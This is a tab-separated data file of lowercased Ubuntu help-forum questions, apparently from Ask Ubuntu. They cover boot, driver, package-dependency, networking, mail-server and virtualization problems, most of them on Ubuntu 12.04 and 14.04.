493450	mounting and dismouting removable volumes changing users	computer with 2 or 3 users . i put a dvd or plug an usb key in the system and everything is ok ! if i change of user , everything becomes out of order even the user is an administrator . i understand that -maybe- it 's due to rights access to removable device but i 'm not sure . is anybody know how do change user and go on to use dvd reader or usb key without having to reboot the computer ? many thanks dom
493451	skydome and dualscreen issues with 14.04 and compiz	this shows the issue with windows . as you can see they seem to be displayed as though there were 4 cubes . the issue is the same if i use the multiple cubes option as well . this shows the skydome issue . whenever i enable a skydome ( the source image is a .jpg ) i get this . i have tried with multiple images and using just the gradient , and it 's the same every time . i have no idea how to fix either of these issues and have n't managed to find anything similar while searching , please help !
493452	will installing python 3.2 from software center replace the original python 2.7 on 12.04 ?	will installing python 3.2 from the software center replace the default python 2.7 on 12.04 ? i would like to keep using python 2.7 , because i am afraid python 3.2 will not recognize code written for 2.7 . thanks . btw , what is the default python version in 14.04 ? i wonder if it is worth to upgrade my ubuntu 12.04 .
493454	i pod touch synch ubuntu	presently i am using a jailbroken ipod touch 4g with ios 6.1.6. and using ubuntu 12.04 . while trying to synch my library rhythm box dialog box says : '' there is not enough space on the device to transfer the selected music , playlists and podcasts '' and shows a green bar indicating that the ipod is full with other data when i go to 'settings-.general- > usage on teh ipod it says there are 24 gigs available . the 'empty space is being interpreted as `` eb '' `` other 18.4eb which i read someone had the exact same problem with the same 18.4 being no writeable or allocated ) ..can anyone tell me why rythmbox thinks differently ?
493458	unmet dependencies while installing default-jre	i am getting the following error while trying to install default-jre . how can i solve this issue ? reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : default-jre : depends : default-jre-headless ( = 1:1.7-43ubuntu4 ) but it is not going to be installed depends : openjdk-7-jre ( > = 7~u3-2.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
493459	dpkg error processing for installing packages	i want to install any packages but when i use apt-get install i have the following error : reading package lists ... done building dependency tree reading state information ... done htop is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 1 not fully installed or removed . after this operation , 0b of additional disk space will be used . setting up w3af ( 1.2-bt2 ) ... tar : pybloomfiltermmap-0.2.0.tar.gz : can not open : no such file or directory tar : error is not recoverable : exiting now tar : child returned status 2 tar : exiting with failure status due to previous errors /var/lib/dpkg/info/w3af.postinst : line 4 : cd : pybloomfiltermmap-0.2.0 : no such file or directory python : ca n't open file 'setup.py ' : [ errno 2 ] no such file or directory svn : repository moved permanently to 'https : //svn.code.sf.net/p/w3af/code/trunk ' ; please relocate dpkg : error processing w3af ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : w3af e : sub-process /usr/bin/dpkg returned an error code ( 1 ) when i want to update it i also have problems on connecting to repositories . how can i fix it ?
493460	how to install 'add-apt-repository ' using terminal ?	i want to install add-apt-repository ppa : ricotz/testin it showing the program add-apt-repository is currently not installed . you can install it by typing : apt-get install python-software-properties can any one suggest what to do now ?
493461	i 'm trying to install ubuntu on acer 5349	well i 'm trying to install ubuntu 12.04.4 on an acer 5349 laptop every time i plug in my live usb flash drive and boot to ubuntu i get this message on a black screen saying syslinux 4.07 edd 2013-07-25 copyright ( c ) 1994-2013 h. peter anvin et al also i 'm not in ubuntu it 's when you turn on the computer and boot to live usb and it does not pass that message and i 'm trying to replace windows 7 home with ubuntu 12.04.4 my friend given his old laptop to me so any help will be great oh forgot to say his windows 7 not working it boots to recovery and crashes to a error code so that 's why i 'm try to put ubuntu on . what can i do to fox this ?
493468	error retrieving default audio device parameters	i am a newbie . i was trying to create a simple hello program in python to implement sip using pjsip . the code i used is : # import sys import pjsua as pj # logging callback def log_cb ( level , str , len ) : print str , # callback to receive events from call class mycallcallback ( pj.callcallback ) : def __init__ ( self , call=none ) : pj.callcallback.__init__ ( self , call ) # notification when call state has changed def on_state ( self ) : print `` call is `` , self.call.info ( ) .state_text , print `` last code = '' , self.call.info ( ) .last_code , print `` ( `` + self.call.info ( ) .last_reason + `` ) '' # notification when call 's media state has changed . def on_media_state ( self ) : global lib if self.call.info ( ) .media_state == pj.mediastate.active : # connect the call to sound device call_slot = self.call.info ( ) .conf_slot lib.conf_connect ( call_slot , 0 ) lib.conf_connect ( 0 , call_slot ) print `` hello world , i can talk ! '' # check command line argument if len ( sys.argv ) ! = 2 : print `` usage : simplecall.py < dst-uri > '' sys.exit ( 1 ) try : # create library instance lib = pj.lib ( ) # init library with default config lib.init ( log_cfg = pj.logconfig ( level=3 , callback=log_cb ) ) # create udp transport which listens to any available port transport = lib.create_transport ( pj.transporttype.udp ) # start the library lib.start ( ) # create local/user-less account acc = lib.create_account_for_transport ( transport ) # make call call = acc.make_call ( sys.argv [ 1 ] , mycallcallback ( ) ) # wait for enter before quitting print `` press < enter > to quit '' input = sys.stdin.readline ( ) .rstrip ( `` \r\n '' ) # we 're done , shutdown the library lib.destroy ( ) lib = none except pj.error , e : print `` exception : `` + str ( e ) lib.destroy ( ) lib = none sys.exit ( 1 ) but when i run it as : python simplehello.py 192.168.15.66 it prints that : 11:25:46.555 os_core_unix.c ! pjlib 2.2.1 for posix initialized 11:25:46.562 sip_endpoint.c .creating endpoint instance ... 11:25:46.564 pjlib .select ( ) i/o queue created ( 0x89ade80 ) 11:25:46.570 sip_endpoint.c .module `` mod-msg-print '' registered 11:25:46.572 sip_transport . .transport manager created . 11:25:46.572 pjsua_core.c .pjsua state changed : null -- > created 11:25:46.627 pjsua_core.c .pjsua version 2.2.1 for linux-3.11.0.15/i686/glibc-2.15 initialized 11:25:46.640 pjsua_aud.c ..error retrieving default audio device parameters : unable to find default audio device ( pjmedia_eaud_nodefdev ) [ status=420006 ] exception : object : { account < sip:10.0.2.15:51342 > } , operation=make_call ( ) , error=unable to find default audio device ( pjmedia_eaud_nodefdev ) any help please.. : (
493470	install google 's us english as default tts engine	i have tried festival and epseak but google 's tts engine feels more natural to me . does anyone have a solution to integrate google 's tts engine into ubuntu so that it can be used for `` read out loud '' in adobe reader and also as a screen narrator . or please suggest any other software to read pdfs , that uses these online tts engines like google 's and ispeech .
493471	switch language does not work on ubuntu 14	i am running ubuntu 14 with english and hebrew enabled but switch language does not work . mostly going back form hebrew to english . after installing the additional language i set the hot-keys for swithing language ctrl+space for one and func+space for other . the problem that after i press ctrl+space i see the 'eng ' heb ' popup window but the language does not chnage . only if i use the mouse to select the desired language the keyboard language really charge .
493472	usb blocking in windows via ubuntu server 12.04	i have a ubuntu server 12.04 , and 2 windows 7 pc 's , i have installed ldap and i want to restrict the usb ports at the windows client pc 's through ubuntu server . ( jus like group policy enforcing in windows ) . thank u
493473	icmp requests are blocked	i connected a kubuntu 14.04 machine to a debian 7.0 with a cross cable . the problem : ping is one-directional . kubuntu machine can see debian , but debian ca n't ping kubuntu . notes : firewall is disabled on both machines : $ sudo ufw status $ status : inactive update ifconfig results : ifconfig eth0 link encap : ethernet hwaddr xx : xx : xx : xx : xx : xx inet addr:192.168.1.10 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :f24d : a2ff : fe90 : ec31/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:347 errors:0 dropped:0 overruns:0 frame:0 tx packets:495 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:50712 ( 50.7 kb ) tx bytes:57402 ( 57.4 kb ) ping from kubuntu ( 192.168.1.10 ) to itself : ping 192.168.1.10 ping 192.168.1.10 ( 192.168.1.10 ) 56 ( 84 ) bytes of data . ^c -- - 192.168.1.10 ping statistics -- - 10 packets transmitted , 0 received , 100 % packet loss , time 9000ms route -n returns : destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0
493474	if i burned a backup image of ubuntu onto a disk would it be possible to login to a live session of this ?	i want to burn an image of my current ubuntu setup onto a thumb drive . my question is will it be possible to login to a live session of my ubuntu setup from the thumb drive .
493476	unable to resume regular ubuntu wm after bluetile	i ca n't resume the regular unity window manager after running bluetile which i installed with apt-get . bluetile has a quit function called by win+shift+q , however upon exit it does n't reset the configuration that existed before calling it from terminal . rather the entire setup is barely usable , with the keyboard not working and only the most recent window continuing to receive input . interestingly the desktop right-click still functions , but the open in terminal here does n't accept keystrokes , so i ca n't use that to log out or type nautillus . how can i make it so switching to bluetile mode and back works ? bluetile is a tiled window manager that runs on top of gnome from what i understand .
493483	after adding amd video card and installing drivers - no sound ( in all os )	ubuntu 13.10 x64 , windows 8.1 x64 . cpu : intel i-4771 mb : asrock b85 pro video card : amd radeon 7750 had a computer properly working with win8 , ubuntu 13.10 , ubuntu 14.01 live cd . i am using two monitors ( vga and dvi/vga ) . amd video card has only hdmi and vga connections . i added my amd video card to pc , joined only one monitor ( dvi/vga ) , installed amd drivers form official page and everything worked well . removed it and continued to use igpu until i get a cable to be able to connect 2 monitors . ordered a hdmi ( m ) dvi ( f ) cable . on monitor with vga cable i 've put dvi adapter and for dvi/vga monitor i used dvi- > hdmi cable . then turned on my pc , booted up ubuntu 13.10 , installed amd ( non-beta ) drivers from official amd page and restarted pc . so there is where problem with sound started to occur : ubuntu started up , drivers looked like it worked ok , but somehow sound has dissapeared . i thought that it is a problem with ubuntu , so i tried several ways to fix it but nothing helped . then i booted up my windows 8 and by my suprise there was no sound too . restarted pc , booted up from ubuntu 14.04 live cd - no sound too . from now how i tried to fix it ( some of them i tried multiple times ) : updated bios to latest - did n't helped . restored defaults from bios - didnt ' helped . took off battery from motherboard - did n't helped . tried connecting only a vga monitor via vga cable - did n't worked . tried checking if wrong device is selected - the right device selected . `` on board sound '' in bios is `` auto '' - true . tried to plug earphones to front/rear connectors - did n't helped . what i have n't tried : doing something with jumpers . update : alsamixer - finds two devices : `` hda intel pch '' and `` hda ati hdmi '' pulseaudio volume control finds only : `` cape verde/pitcairn hdmi audio [ radeon hd 7700/7800 series ] digital stereo ( hdmi ) '' with port '' hdmi/displayport '' i know that this problem is not completely related to ubuntu , but did n't find better place for this question .
493484	how to fix/install grub ?	i 'm facing a problem of not being able to boot into linux . i get the `` grub-rescue '' crash ( as the one mentioned here . but my problem is really very different . i do n't have to /boot directory on my hard-drive ! i do n't know how that happened . my laptop was being slow . i had a vm running ( using vmware workstation ) and lot of browser tabs opened . the vm displayed a message that it was n't getting enough memory and that it had to suspend the vm . so i clicked `` ok '' and waited for a minute or two . i have a 256gb ssd and i thought that it should have suspended the vm . so i try to use my computer but everything appears to be frozen . so i restart . and then i get the `` grub rescue '' prompt . : - ( so i booted into a live usb disk and i see only the following directories on my hard-drive : dev , proc , run , sys , usr . so the os is not able to see other directories , i guess . i guess the data is still there because the total size of the above directories is 119gb and i have a free space of 70.2 gb . moreover , ubuntu ( the live usb one ) is displaying `` some contents unreadable '' when i see the properties of my hard-drive . i want to know is there any way i can repair my grub , get my other directories and get to work ubuntu as it was before without installing a clean , new copy of ubuntu . is there any way to repair grub and/or hard-drive ? p.s . : i have tried using boot-repair through the live usb but it does n't help . i have used the 'recommended repair ' option without success . in `` advanced options '' of boot repair utility the `` grub location '' , `` grub options '' and `` mbr options '' is disabled . the only thing i can do is `` restore mbr '' ( which does n't help ) . any help would be appreciated . thanks !
493488	i am using ubuntu 12.04.presently i am having a booting problem relating busybox v1.18.5 and initramfs prompt	mount : mounting /dev/disk/by-uuid/02bc41cc-1e21-4700-a179-be2805a658c4 on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . busybox v1.18 . ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands ( initramfs ) please suggest a way out . i am dual booting with windows 7 and i have many photos which i can not afford to lose .
493489	dual booting ubuntu with windows 7	i already have ubuntu and i want to dual boot windows alongside this beautiful operating system . can i get a tutorial from someone where i do n't have to re-install ubuntu and start from scatch ? thank you , ubuntu users .
493491	issue with creating partition in windows 7 ubuntu dualboot	i had windows 7 and ubuntu running on a dual boot in my dell laptop . i formatted it yesterday to do a clean install of both operating systems . i deleted all the operating system partitions . here 's what i did : created a new partition and installed windows 7 . booted into the ubuntu live disk and selected `` something else '' . i had 3 partitions : /dev/sda1 - fat32 - recovery partition || /dev/sda2 - ntfs - system reserved || /dev/sda3 - ntfs - windows 7 || free space i clicked on `` add '' in order to create the /boot partition . i selected primary and ext4 . the next moment i find my free space being marked as unusable . now , i 've always had this layout while dual installing windows 7 and ubuntu . and i am pretty sure i selected primary while creating the /boot partition . and things have worked out pretty well . but this time , if i follow the same steps , it marks the remaining free space as unusable . i had to proceed by making all the linux paritions ( /boot , / , /home ) as logical . ubuntu installed correctly , but now when i start up , i am presented with the linux operating select screen . i mean i do n't get this screen , which is quite understandable since i did n't have the /boot partition as primary : i get a screen similar to this from where i can select windows or ubuntu : my question is why am i blocked if i select /boot as primary . it worked fine earlier , but now it does n't .
493497	how to uninstall hbase from ubuntu ?	i had installed hbase -0.94 in my ubuntu system . i want to uninstall it now . i tried , sudo apt-get purge hadoop-hbase but it shows unable to locate package . help me uninstall it .
493499	acpi not running custom script on power button press	any idea how i can debug acpid not starting my custom script on modified xfce4 environment . i 've modified `` /etc/acpi/events/powerbtn '' to point to the correct script : event=button [ / ] power action=/etc/acpi/my-acpi-script
493507	flux for ubuntu 14.04 - possible ?	is it possible to make flux work in ubuntu 14.04 ? if so , maybe you can share your knowledge or point me to a guide ? ( flux is software which adjusts temperature of your display according to time of the day )
493514	battery consumption comparison of unity , gnome , gnome classic xfce and lxde	i would like to know what is the rank of the current lts version in term of probable consumption of battery power -ie : for a same usage . is the following rank probably correct , where top of the rank means `` uses the highest level of battery power '' , and where bottom of the rank means `` needs the less level of battery power '' : concerning ubuntu 14.04 ubuntu unity ubuntu gnome ubuntu gnome classic xubuntu lubuntu that will usefull for people who would like to optimize their instant battery duration , like travellers using laptop for example .
493515	how to make usp pendrive as bootable in ubuntu	i am using ubuntu 12.04 . i wan to install solaris 10 along with ubuntu 12.04 . but my question is how to make usp pendrive as bootable in ubuntu . please help me .
493518	external monitor connected at boot in 14,04	i recently upgraded from 12.04 to 14.04 . ever since if i boot up with the external monitor plugged in ( to dell lattitude d430 laptop ) both screens come up but no program menus or task bar - just the wallpaper . i have to ctrl + alt + f1 to get terminal to shutdown and re-start with vga cable unplugged . without vga plugged in it boots fine and then i can plug vga in and it works fine with correct settings resolution etc . the problem never occurred in 12.04 . thanks for any suggestions . grant
493520	somethign similar to notification center ?	does software exist for ubuntu 14.04 , which would notify you about facebook notifications , notify you about new emails and so on ? if so , i would like to ask you to mention it . thanks .
493521	software center is not working anymore	software center on ubuntu 14.04 is n't working anymore . i did not install anything but now it does n't start . clicking on the software center icon , it just starts loading for 3 seconds and then the window disappears . i am using running software center from terminal gives me : attributeerror : 'nonetype ' object has no attribute '__contains__' reinstalling it using `` sudo apt-get install -- reintall sofware-center '' i get : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/repository.spotify.com_dists_stable_non-free_i18n_translation-en % 5fgb e : the package lists or status file could not be parsed or opened . trying `` sudo apt-get update & & sudo apt-get upgrade '' , gets me : fetched 1,706 kb in 7s ( 233 kb/s ) w : gpg error : https : //download.01.org trusty inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey a902dda375e52366 w : failed to fetch http : //ppa.launchpad.net/kernel-ppa/ppa/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/kernel-ppa/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . killing it does n't help as well . `` killall software-center '' says : justinas @ justinas-u31sd : ~ $ killall software-center software-center : no process found
493522	error when trying to install / update adobe flash	when trying to install/update adobe flash on ubuntu , i get the following error . reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/www.geekconnection.org_remastersys_repository_karmic_en e : the package lists or status file could not be parsed or opened . mcalab2 @ mcalab-veriton-series : ~ $ how can i solve this ?
493523	problem with cifs-util . mount : only root can mount	i 'm trying to use cifs-utils to get files in another machine . in the other machine i 've installed samba . everything works fine if a try in the same machine ( the one with samba ) using cifs-util , but it does n't if i try with another in the intranet . here 's what i 've done : 1 ) i 've installed cifs-util 2 ) i 've added the following line to the /etc/fstab file : //192.168.0.72/triple_rdf /media/triple cifs credentials=/home/ubuntu/.smbcredentials , iocharset=utf8 , sec=ntlm 0 0 3 ) i 've created the .smbcredentials file typing : gedit ~/.smbcredentials and adding the lines username= [ username ] e password= [ password ] . of course i put my real username and password instead of [ username ] and [ password ] . 4 ) then i changed the permits of the previous file typing : chmod 600 ~/.smbcredentials since i 'm using ubuntu 14.04 it apppears an icon on the nautilius bar ( the one on the left side ) , but when i click on it appens nothing . if i try to go inside of the `` triple '' which now appears with my network resources the system says : mount : only root can mount //192.168.0.72/triple_rdf on /media/triple . i thought that may be it could be a problem of permits in the destination folder , /media/triple . so i changed those . here my ls -al output of the /media/triple folder : drwxrwxr-x 2 user group 4096 ... where instead of user and group i put the real ones . anybody knows which could be the problem ?
493524	error installing libatlas	i am trying to install libatlas on my system elementary luna os using the steps given here since i can not add a comment there , i have to ask this here . i get the following error on trying this command : ~ $ fakeroot debian/rules custom /usr/bin/fakeroot : line 178 : /debian/rules : no such file or directory what could be the possible reason for this error ? i found somewhere that it might be fixed by replacing debian by /debiam , but even that continues to give an error . what does it mean to `` type the following from the atlas source subdir : `` ? any help would be appreciated . thanks in advance !
493528	mail server postfix + dovecot	i 'm running mail server on ubuntu 12.04 and box has web server + mail server ( postfix + dovecot ) . this is virtual machine setup on windows azure cloud . problem : i 'm unable to send emails outside network . following are the configuration and logs . postfix : alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no config_directory = /etc/postfix dovecot_destination_recipient_limit = 1 inet_interfaces = all mailbox_size_limit = 0 mydestination = abc.cloudapp.net , localhost.abc.cloudapp.net , localhost myhostname = abc.cloudapp.net mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 myorigin = /etc/mailname readme_directory = no recipient_delimiter = + relayhost = smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_use_tls = yes virtual_alias_maps = mysql : /etc/postfix/mysql-virtual-alias-maps.cf virtual_mailbox_domains = mysql : /etc/postfix/mysql-virtual-mailbox-domains.cf virtual_mailbox_maps = mysql : /etc/postfix/mysql-virtual-mailbox-maps.cf virtual_transport = dovecot dovecot : # 2.0.19 : /etc/dovecot/dovecot.conf # os : linux 3.2.0-65-virtual x86_64 ubuntu 12.04.4 lts ext4 auth_mechanisms = plain login mail_location = maildir : /var/vmail/ % d/ % n/maildir managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i ; ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave passdb { args = /etc/dovecot/dovecot-sql.conf.ext driver = sql } plugin { sieve = ~/.dovecot.sieve sieve_dir = ~/sieve } protocols = `` imap sieve pop3 '' service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0660 user = postfix } unix_listener auth-userdb { group = vmail user = vmail } } ssl_cert = < /etc/ssl/certs/mailserver.pem ssl_key = < /etc/ssl/private/mailserver.pem userdb { args = uid=vmail gid=vmail home=/var/vmail/ % d/ % n driver = static } protocol lda { mail_plugins = `` sieve '' } /var/log/mail.log jul 9 08:40:11 layfootak postfix/smtpd [ 44127 ] : connect from unknown [ 87.109.35.199 ] jul 9 08:40:12 layfootak postfix/smtpd [ 44127 ] : noqueue : reject : rcpt from unknown [ 87.109.35.199 ] : 554 5.7.1 < raheel @ layfootak.com > : relay access denied ; from= < abc @ example.com > to= < abc @ otherdomain.com > proto=esmtp helo= < [ 127.0.0.1 ] > i 'm able to configure and get emails properly with mozilla thunderbird email client . it shows my inbox properly but when i 'm sending an email to other email address like outside network then it gives relay access denied ; from= to= proto=esmtp helo= < [ 127.0.0.1 ] > please advise me . i 've fixed the problem after setting up following postfix configuration for smtp relaying configuration : sudo postconf -e smtpd_sasl_type=dovecot sudo postconf -e smtpd_sasl_path=private/auth sudo postconf -e smtpd_sasl_auth_enable=yes sudo postconf -e smtpd_tls_security_level=may sudo postconf -e smtpd_tls_auth_only=yes sudo postconf -e smtpd_tls_cert_file=/etc/ssl/certs/mailserver.pem sudo postconf -e smtpd_tls_key_file=/etc/ssl/private/mailserver.pem sudo postconf -e smtpd_recipient_restrictions= '' \ permit_mynetworks \ permit_sasl_authenticated \ reject_unauth_destination ''
493530	edited rc-sysinit.conf system wo n't boot	i have modified the default_runlevel from 2 ( graphical interface ) to 1 in rc-sysinit.conf , to install drivers for gpu . after choosing either default or recovery mode , i see just black screen . any ideas , what went wrong and how to get into text interface or at least revert the changes ? any help will be much appreciated . i am running ubuntu 12.04 as a second system .
493531	ssh to user from external network says permission denied , works fine from internal network	okay , i have openstack installed on a server . i can ssh to the openstack server i have set port forwarding on that server i can ssh to the instance using private and public ( floating ) ips when done from internal network but , when i try ssh user @ public.ip , from outside the servers network , i do reach the ssh server and i am asked for password , but even after entering the correct password , it does not accept it.. asks for it 3 times , n finally says , permission denied ( publickey , password ) i have also tried changing permissions of the .ssh directory and its contents as well as the owners for the same , but that does n't work either ... what can i do ?
493532	problem in bookmark updation firefox	i bookmarked lot of pages and i export them as well into a html file . the thing is whenever is bookmark a page can it automatically get updated or synced with the html file . i use 13.10 and firefox 30 .
493534	virtualbox server/client topology	i have ubuntu 14.04 desktop machine that virtualbox installed on it . i make two virtual machines , one ubuntu server , the other is lubuntu client . the default setting allow me to get internet from guests to internet through 3g modem connected to the host machine cause the guests use nat by default , but i ca n't reach from client to server . i want to put the two guests in separated network and let the guest server to connect to internet through nat with another network interface , and make the guest client connect to internet through the guest server . i did the following : on guest server i added two network interfaces , one for local network and the other for nat . on guest client i added local network interface only . what should i do to make the guest server reach the internet and then make the guest client reach also to internet but through the guest server ?
493535	ca n't locate storage . dual boot system	i am new to ubuntu . i am dual booting my system w/ windows 8 . i have the os on a ssd i have 4 1 terabyte hhd for storage . they are set up in windows under a storage pool . when i am ubuntu the drives are not visible . how do i fix this ?
493537	blueproximity and lightdm / xubuntu	i would like to use blueproximity to lock/unlock my session in xubuntu 14.04 . problem is that i could not find lightdm command for unlocking a screen ( googled several times ) . i would prefer not to use xscreensaver ( ugly ) or gnome-screensaver . for me the best option is to somehow modify source code of lightdm or xflock4 to unlock screen but i have no idea what needs to be modified .
493538	installing ethernet card driver while inside live cd	i want to install rtl8723au ethernet driver before actually installing os , so that i would have access to the internet in the process ( wi-fi is the only option ) . i have all the files i need for that , but i do n't know how to actually access them while i 'm inside the live cd . is there a way to include it ( the folder with the driver ) somehow into the live cd and install it from there , or preinstall it into iso image ? i need to be able to execute the following commands for drivers to be installed : make sudo make install sudo modprobe 8723au also , one additional question , if i somehow do n't have `` make '' preinstalled , how can i install it without internet connection ?
493540	citrix and firefox in ubuntu 12.04 window disappears too fast !	running 12.04 and got citrix receiver installed ok ( i think ) but when i go to launch an .ica and i have set firefox to use wfica to handle these files , a window pops up and then disappears super fast ... i cant see what it says or what is going on . any ideas ? can i run something in terminal to give me info on what occurs ? thanks
493541	hardware enablement stack ( hwe ) out of support	from yesterday my update manager gives me this message : your current hardware enablement stack ( hwe ) is going out of support on 07/08/2014 . after this date security updates for critical parts ( kernel and graphics stack ) of your system will no longer be available . for more information , please see : http : //wiki.ubuntu.com/1204_hwe_eol but when i try to upgrade the hwe with the command suggested by hwe-support-status -- verbose that is sudo apt-get install linux-generic-lts-trusty libgl1-mesa-glx-lts-trusty xserver-xorg-lts-trusty linux-image-generic-lts-trusty i get dependency errors : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libgl1-mesa-glx-lts-trusty : depends : libglapi-mesa-lts-trusty ( = 10.1.3-0ubuntu0.1~precise1 ) but it is not going to be installed xserver-xorg-lts-trusty : recommends : xserver-xorg-input-all-lts-trusty but it is not going to be installed recommends : xserver-xorg-video-all-lts-trusty but it is not going to be installed recommends : x11-xserver-utils-lts-trusty but it is not going to be installed conflicts : libglapi-mesa : i386 ( > = 0~ ) e : unable to correct problems , you have held broken packages . how can i solve this ? i 'm running ubuntu 12.04.4 lts 64 bit with kernel 3.5.0-53-generic .
493543	should i be worried about `` ubuntu experienced internal error on restart '' errors ?	whenever i restart i get an ubuntu experienced internal error asking for details shows the crash is located in usr/bin/xorg . should i be worried about this ? so far i have not found out what is affected by this crash . it 's at the very least annoying so i would like to fix this . if it matters i run on a elitebook 8570w .
493544	ubuntu14.04 installed but no gui	i have windows 7 64 bit on my system , i installed ubuntu 14.04 with help of daemon tools . everything runs smoothly and while booting of ubuntu , i seen a /tmp directory issue which ignore withi now i am getting only tty1 to tty6 screen , no gui . i tried to install unitiy using sudo apt-get but gives error unable to mkdir /var .. ( i do n't remember complete sentence ) i found that /root does n't have write permission as well as /var directory please help me to enable/install gui screen . what i think : i have to mount that image which may be essential to complete some missing things .
493546	how to test out the smtp server ?	i am testing my smtp server through wormly.com when i do the test , i end up with > smtp - > from server : 250 2.1.0 ok rcpt to : mygmailaddress @ gmail.com > smtp - > from server : 554 5.7.1 : relay access denied smtp - > error : > rcpt not accepted from server : 554 5.7.1 : relay access denied message sending failed . i setup my mail server with the help of this link
493547	show the menus for a window in the menu bar not working	i am running ubuntu 14.04 . recently i checked the option to show app menus `` in the window 's title bar '' . but now i want to restore it . neither clicking the `` restore behavior settings '' , nor selecting `` in the menu bar '' works . any ideas what is going wrong ? take a look at the screenshot . as you see , in the appearance settings i selected showing menus in the menu bar , however the menus are shown in the application window . http : //postimg.org/image/gnxo6h877/full/ thanks , nick
493552	can not ping myhostname without using myhostname.local	i use my ubuntu 12.04 laptop across many network and i need to make my hostname ( internally from my very laptop ) pingable or 'http ' accessible with the ip address assigned me by the dhcp servers of the network i connect to . if i ping myhostname i have the result : 'myhostname unknown host ' . if i ping myhostname.local i 'm replied correctly with the ip i 'm expecting ( the one assigned me by the dhcp server ) . i tried adding the string 'local ' ( without hyphens ) in the search box of the connection in networkmanager ... no way . i tried adding the string 'domain local ' in the head file of the resolvconf.d folder ... no way . i tried installing samba ... same behaviour . how can i make myhostname search be defaulted to myhostname.local without updating /etc/hosts everytime i change network ? thanks in advance
493554	can not apply a static ip address to virtual pc ?	i installed an ubuntu 12.04 lts server as a virual server using wmware workstation 10 . unfortunately when i change the dhcp setting to static . the server is unable connect to our network , it works fine when its dhcp . any idea ? here are some additional info .
493555	ubuntu 12.04 unity - applications missing from dash	when starting the dash ( e.g . by hitting the windows key ) quite often ( most of the time ) there are no applications listed . recent files and downloads show fine , but in order to have applications listed i have to do unity -- reset having searched and searched i can mostly only find issues about the launcher missing entirely , not the applications missing from the launcher . i found and tried the suggestion in this question to no effect . having to reset unity is frustrating , especially as i use a second monitor as it means going into compiz config every time to change my settings again to remove the launcher from the second screen . is there a way to fix this ?
493558	how to install library files	i installed skype translting software clown fish in linux ( ubuntu 14.04 lts ) . but it was not working properly . in the clown fish website they have specified required library files for the proper working of the software . the following are the files . how do i install those files libgtk-x11-2.0.so.0 libgdk-x11-2.0.so.0 libgdk_pixbuf-2.0.so.0 libfontconfig.so.1 libxrender.so.1 libx11.so.6 libgobject-2.0.so.0 libxft.so.2 libfreetype.so.6 libpthread.so.0 librt.so.1 libz.so.1 libpng12.so.0 libstdc++.so.6 libm.so.6 libgcc_s.so.1 libc.so.6
493559	network communication	what component of operating system is responsible for network communication ? i also want to know what input/output it takes/receive during this communication . it would be a great help if i can have a architecture of that component .
493560	make bootable image from non-bootable to use with qemu	i hope the question is not duplicate , i did n't find anything helpful by myself . ( and sorry for my english ) i have a new raspberry pi , and i need to install on it an os with some softwares . i downloaded raspbian on the official website ( http : //www.raspberrypi.org/downloads/ ) no problem for that . and since the raspberry is slow , i have to launch the image of raspbian on my computer , make modifications , save the new image , and put it on the the device via sd-card . to launch the image , i am using qemu . i 'm quite sure the configuration is ok , because i tried with an iso of ubuntu and it worked well . but , when i try to start raspbian , qemu says it is not a bootable device . and i did n't find a way to make a bootable iso ( or a bootable img ) from my non-bootable img without using usb or cd . so that 's my question ( yes , finally ) . i have a non bootable .img and i need a bootable .img ( not on a usb , not on a cd ) to use qemu how can i do ? ( i am using ubuntu 14.04 ) thanks you ! edit : the image was great , i just forgot the specific kernel for qemu ... it 's working now .
